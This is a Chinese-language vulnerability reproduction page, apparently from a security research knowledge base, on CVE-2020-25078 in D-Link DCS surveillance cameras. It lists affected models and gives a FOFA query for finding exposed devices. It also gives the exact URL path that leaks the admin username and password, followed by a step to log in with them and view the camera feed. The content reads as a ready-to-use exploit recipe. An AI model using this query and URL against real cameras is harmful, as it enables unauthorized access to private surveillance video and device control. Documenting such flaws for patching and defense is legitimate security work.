menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-25078)D-Link DCS系列监控 账号密码信息泄露漏洞 chevron_right (CVE-2020-25078)D-Link DCS系列监控 账号密码信息泄露漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-25078)D-Link DCS系列监控 账号密码信息泄露漏洞.md
    1 KB / 2021-07-15 19:46:13
        # D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

## 漏洞描述

D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面

## 漏洞影响

`DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703`

## FOFA

`app="D_Link-DCS-2530L"`

## 漏洞复现

访问登录页面如下

![](resource/CVE-2020-25078-D-Link-DCS系列监控-账号密码信息泄露漏洞/media/1.png)

出现漏洞的 Url 为, 其中泄露了账号密码

`http://xxx.xxx.xxx.xxx/config/getuser?index=0`

![](resource/CVE-2020-25078-D-Link-DCS系列监控-账号密码信息泄露漏洞/media/2.png)

使用泄露的账号密码登陆系统

![](resource/CVE-2020-25078-D-Link-DCS系列监控-账号密码信息泄露漏洞/media/3.png)

## Goby & POC

D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078

![](resource/CVE-2020-25078-D-Link-DCS系列监控-账号密码信息泄露漏洞/media/4.png)
    links
    file_download